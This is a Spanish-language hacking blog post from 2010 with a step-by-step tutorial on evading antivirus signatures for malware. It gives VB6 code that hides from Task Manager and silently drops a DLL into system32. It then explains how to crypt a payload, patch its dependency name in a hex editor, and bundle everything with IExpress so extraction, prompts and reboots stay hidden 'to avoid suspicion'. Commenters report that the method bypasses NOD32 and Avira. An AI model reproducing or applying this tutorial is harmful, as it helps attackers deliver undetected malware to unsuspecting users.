28 may 2010

Saltar las firmas Antivirus: Método D.A.F (Dependencias Anti-Firmas)

By Leo Romero 28 may 2010 23:18 , ,
Bueno acá les traigo un manual que les explicara paso a paso como saltar las firmas que ponen ciertas compañías Antivirus en las dependencias de los ejecutables, el manual esta reescrito por mi y la fuente es de Indetectables.net en fin... espero que me entiendan y les sirva... saludos.

Vamos hacer un ejecutable portable con la ayuda de Iexpress y un par de aplicaciones nuestras que serán el malware a introducir y un pequeño programa de fácil creación desde cualquier lenguaje de programación, en este caso lo haremos con VB6 que también ha sido testeado con Windows 7.

lo primero que hacemos es crear ese EXE que hará todo nuestro trabajo, abriremos VB y seleccionamos “EXE estandar”.

Haremos doble clic sobre el formulario para que aparezca de tal manera que podamos introducir nuestro código.
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer
As String, ByVal nSize As Long) As Long
Private Sub Form_Initialize()
   Dim FFile As Long
   Dim sysDir As String
   Dim sLen As Long
   Dim Resource() As Byte
   sysDir = Space(260)
   sLen = GetSystemDirectory(sysDir, 260)
   sysDir = Left$(sysDir, sLen)
   On Error Resume Next
   Resource = LoadResData(101, "CUSTOM")
   FFile = FreeFile
   Open sysDir & "\aaaaaaaa.sys" For Binary Shared As #FFile
   Put #FFile, 1, Resource
   Close #FFile
End Sub
Private Sub form_load()
'Se esconde la aplicación
Me.Hide
'Desaparece del Taskmannager
App.TaskVisible = False
'Si ya esta en ejecución salimos, para no tener 2 corriendo a la vez
If App.PrevInstance = True Then: End
End
End Sub

Hacemos Click sobre el menú de complementos y se nos abrirá un desplegable para dirigirnos al “Administrador de complementos”.

Una nueva ventana se abrirá para seleccionar “VB 6 Resource Editor”, tildaremos la pestaña de Cargado y finalmente click en Aceptar.

Si miramos en la parte de arriba de nuestro VB6, veremos una mano blanca sobre lo más parecido a un cubo rubik, hacemos click en él.

Aparecerá la ventana donde podremos agregar de recurso nuestra dependencia al hacer click en el icono marcado en rojo.

En este caso haremos la prueba con la DLL de ejecución más importante que utiliza VB6, modificada anteriormente para que no ocupe tanto en nuestro Malware al final.

Al darle click y sobre Abrir aparecerá el siguiente recuadro en el que veremos a nuestra Dependencias.

Haremos click sobre en el dichoso icono guardado representando un disquete y elegiremos una ruta para guardar nuestro archivo “.RES”.

Una vez guardado automáticamente se añadirá a nuestro proyecto.

Hecha la parte más difícil tan solo nos quedará elegir el nombre con el que queremos que se copie nuestra DLL en sistema, iremos a la parte de código y donde aparece con el nombre elegido por mi para las pruebas de “aaaaaaaa.sys” modificaremos introduciendo el que queremos pero teniendo en cuenta que no podremos superar los caracteres de la dependencia real que después modificaremos desde un editor Hexadecimal.
Open sysDir & "\4n0nym.0us" For Binary Shared As #FFile
 Put #FFile, 1, Resource
 Close #FFile

Como se ve en la imagen modificado:

Ya terminamos nos quedará presionar en “Archivo > Generar Proyecto1.exe

Seleccionaremos la ruta y nombre donde guardar nuestro ejecutable y acabaremos con el Visual Basic

Nos dirigimos a nuestro malware, en este caso elegiremos un simple Notepad encriptado con un encriptador llamado Billar Crypter v2.0 Abrimos nuestro editor hexadecimal “Hex Workshops” e introducimos nuestro ejecutable encriptado y buscamos la dependencia a modificar.

Iremos a la herramienta de reemplazo en la que al encontrarnos con diferente número de caracteres tendremos que rellenar al “4n0nym.0us” (nuevo nombre de dependencia) con ceros a la derecha para que los ignore el código y todo funcione.

Al presionar sobre Aceptar saltará la siguiente ventana con la que modificaremos todas a la vez.

Con esto acabaremos de cargarnos el ejecutable si no le incorporamos nuestra dependencia de VB.

Si al ejecutar nuestro EXE sale este error todo funciona bien por ahora.

Iremos a “Inicio > Ejecutar > Iexpress” y empezaremos a juntar nuestros dos ejecutables para finalizar con el salteo de firmas en dependencias.

Sigan las instrucciones aunque el uso de esta herramienta es de lo más simple que hicieron nuestros amigos de Mocosoft.XD

Elegimos un nombre para el título de nuestro paquete de aplicaciones.

Seleccionamos la opción de “No prompt” y presionamos “Siguiente”.

Elegimos esta opción que aparece más abajo para que no muestre el display de licencia.

Presionando en el botón “Add”, buscaremos nuestros dos archivos.

En este paso seleccionamos el orden de ejecución de dichas aplicaciones, en primer lugar la “Dependencia.exe” para evitar el posible error de no encontrar la nueva “4n0nym.0us” y en el comando seleccionaremos nuestro ejecutable modificado.

Dependiendo del malware que se va a utilizar, configuren esta opción como prefieran si desean hacerlo todo de forma oculta o en mi caso queremos ver que el Notepad se ejecuta.

Seleccionamos esta opción para que no muestre ningún mensaje al finalizar las descompresiones.

Ocultamos las animaciones de extracción para que el usuario no vea nada extraño en la ejecución del archivo.

Seleccionamos la opción de no reiniciar la máquina para evitar sospechas.

En este caso elijan la que ustedes decidan pero a mi no me apetece guardar la directiva.

Presionamos siguiente y seguidamente aparecerá la ruta donde deseamos guardar nuestro ejecutable final.

Y finalizando presionamos en el botón marcado en rojo para acabar con todo el proceso.

Solo nos queda hacer la prueba y observar si ciertamente funciona, para eso vamos a la carpeta donde guardado nuestro ejecutable y por curiosidad abramos la ruta de “%Windir%/system32” para observar como automáticamente se agrega la dependencia al sistema y después se ejecuta nuestro “malware” en este caso un Notepad con lado oscuro XD.

Ejemplo sobre WXP SP2 32bits:

Ejemplo sobre W7 Ultimate 64bits:

Espero que les ayude en algo XD les mando saludos.

Descargar Método D.A.F. en PDF

Autor: 4nonym0u
Fuente: http://reactos.diosdelared.com/

Author & Editor

Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.

4 Notaciones:

  1. Anónimo29 de mayo de 2010, 13:08

    el tuto no es de reactos es verdadero autor es 4nonym0us de indetectables.net arregla eso ;)

    ResponderEliminar
  2. Leo Romero29 de mayo de 2010, 16:31

    Te voy a creer, pero no logré encontrar la fuente real.

    [+] Salu2

    ResponderEliminar
  3. Anónimo6 de junio de 2010, 16:21

    ya lo conocia! este metodo funciona excelente!! salta NOD32 y Avira en un momento! lo encontre en pdf http://www.megaupload.com/?d=U2GEQM2N

    ResponderEliminar
  4. Leo Romero6 de junio de 2010, 20:31

    Muchas Gracias ;)

    ResponderEliminar

Suscribirse a: Enviar comentarios (Atom)

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.